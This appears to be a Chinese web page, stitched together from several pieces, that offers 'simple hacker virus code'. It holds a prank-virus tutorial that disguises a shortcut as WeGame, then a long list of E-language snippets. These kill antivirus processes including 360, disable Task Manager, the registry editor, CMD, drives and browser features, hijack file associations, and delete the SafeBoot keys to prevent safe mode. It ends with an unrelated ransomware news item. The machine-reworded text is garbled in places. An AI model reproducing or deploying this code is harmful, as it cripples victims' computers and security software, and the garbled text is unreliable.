黑客简单病毒代码(黑客病毒代码)

访客4年前 (2020-10-04)黑客工具778

这几天急事不太好升级这一，终究必须设计构思。今日升级辣！兄弟萌，还记得关注关心啊，个人收藏我不会奢望了。qaq低贱

制做病原体必须一定的程序编写基本功，必须搞清楚计算机专业語言、电脑杀毒软件的运行 *** 等。自然，还可以根据将撰写好的编码与DOS命令相互配合迅速建立一些没害的病毒程序。

下边将以制做简易的捉弄病原体为例子，详细介绍病原体的 *** 过程。

8.按要求键入后，点击“明确”按键，就可以消除重新启动。

自然，没有人会立即双击鼠标这一不认识的标志。那麼就必须将病原体开展隐藏，根据别的方式让他人开启。

4.在“更改图标”提示框中点击“访问 ”按键

5.寻找必须的标志，以wegame为例子

6.点击明确按键就可以更改图标，随后把快捷方式图标重新命名为wegame就可以了

7.可以吧源代码藏到找不着的地区，还可以在源代码的特性中启用“隐藏”复选择项，点击明确按键

随后大家就可以开心的搞事了，就先写如何多吧，一段时间有时间了在升级嗷。

你了解非常简单的计算机病毒代码是什么吗!简单的代码不易被电脑杀毒软件发觉!下边由小七我让你作出详尽的非常简单的计算机病毒编码详细介绍!期待对给你协助!

非常简单的计算机病毒编码详细介绍：

绕开电脑杀毒软件防御力：

运作 (“taskkill /f /im kavsvc.exe”, 假, 1)

运作 (“taskkill /f /im KVXP.kxp”, 假, 1)

运作 (“taskkill /f /im Rav.exe”, 假, 1)

运作 (“taskkill /f /im Ravmon.exe”, 假, 1)

运作 (“taskkill /f /im Mcshield.exe”, 假, 1)

运作 (“taskkill /f /im VsTskMgr.exe”, 假, 1)

修改系统時间：

置现行标准時间 (到時间 (“8888年8月8日”))

禁止使用资源管理器：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr”, 0)

禁止使用注册表文件：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Disableregistrytools”, 1)

隐藏刚开始中的运作严禁WIN2000/XP根据资源管理器建立新每日任务：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun”, 1)

隐藏“MS-DOS *** ”下的磁盘驱动器。无论是在“我的电脑”里，或“MS-DOS” *** 下都看不到了：

写注册项 (3, “SoftWare \\Microsoft \\Windows \\CurrentVersion \\Policies\\WinOldApp\\Disabled”, 1)

隐藏刚开始中的待机：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose”, 1)

隐藏刚开始中的检索：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind”, 1)

OVER360防御力：

写注册项 (4, “SOFTWARE\\360Safe\\safemon\\ExecAccess”, 0)

写注册项 (4, “SOFTWARE\\360Safe\\safemon\\MonAccess”, 0)

写注册项 (4, “SOFTWARE\\360Safe\\safemon\\SiteAccess”, 0)

写注册项 (4, “SOFTWARE\\360Safe\\safemon\\UDiskAccess”, 0)

完毕360过程

运作 (“taskkill /f /im 360tray.exe”, 假, 1)

隐藏全部控制器：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives”, 4294967295)

严禁全部控制器：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewOnDrive”, 4294967295)

隐藏文件夹选项：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions”, 1)

将桌面上目标隐藏：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop”, 1)

隐藏刚开始中的待机：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose”, 1)

隐藏刚开始中的检索：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind”, 1)

这条有二种状况。1 禁止使用CMD和.BAT文档 2 禁CMD禁不住.BAT 0开启二项

写注册项

(3, “Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD”, 1)

隐藏首页选择项组：

写注册项 (3, “Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage”, 1)

隐藏IE文档莱单：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu”, 1)

隐藏网址收藏夹莱单：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoFavorites”, 1)

禁止使用IE复印作用：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoPrinting”, 1)

隐藏Internet选择项：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions”, 1)

严禁IE查看源文件：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoViewSource”, 1)

禁止使用IE免费下载作用：

写注册项

(3, “Software\\Microsoft\\Windows\\CurrentVersion\\Interner Settings\\Zones\\3\\1803”, 3)

严禁鼠标右键关系莱单：

写注册项

(3, “Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu”, 1)

改动文件关联：

写注册项 (1, “.txt\\”, “jpegfile”)

写注册项 (1, “.inf\\”, “jpegfile”)

写注册项 (1, “.reg\\”, “jpegfile”)

写注册项 (1, “.exe\\”, “jpegfile”)

没法进到安全中心：

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{36FC9E60-C465-11CF-8056-444553540000}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E965-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E967-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E969-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E96A-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E96B-E325-11CE-BFC1-08002BE10318}\\”)

删除注册项

(4, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{2D36E96F-E325-11CE-BFC1-08002BE10318}\\ ”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Net *** \”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDE

　　Group\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdses *** gr\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network dpipe.sy

　　s\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network dtcp.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network ermservice\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)

　　删除注册项

　　(4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)

　　删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\”)

　　关机：

　　关闭系统 (2, 假)

　　关机2：

　　运行(“shutdown -s -f ”)

　　以上是学习啦小编给朋友们做出的总结!希望对你们有帮助!

　　近日，瑞星安全专家在国内率先截获了一个病毒样本，由于其他安全厂商并未发布过该勒索病毒，所以瑞星将该勒索病毒样本命名为“GoRansom”。通过分析病毒代码发现，病毒作者来自巴西，声称为了研究勒索病毒原理，居然轻易地将此病毒代码公开？这就意味着，一旦该勒索病毒被其他不法分子利用，将给社会造成非常大的危害。

　　瑞星安全专家称此病毒作者公开代码这个行为非常危险，该勒索病毒代码加密体系已经非常成熟。病毒作者还在两个月前更新了最新的代码，瑞星在 2019 年 1 月 16 号就捕获到了利用此源码生成的病毒exe程序。从捕获日期推测，已经有攻击者在研究测试该病毒。

　　图：病毒作者github主页

　　“GoRansom”勒索病毒采用Go语言开发，使用非对称算法加密文件，病毒运行后会加密指定文件，包括文档、图片、视频等格式文件，被加密文件会被追加上“.encrypted”后缀，然后在桌面释放勒索提示，用户支付赎金解锁文件。目前，瑞星E *** 及瑞星之剑等产品均可对该病毒进行防御和查杀，避免用户文件被病毒加密。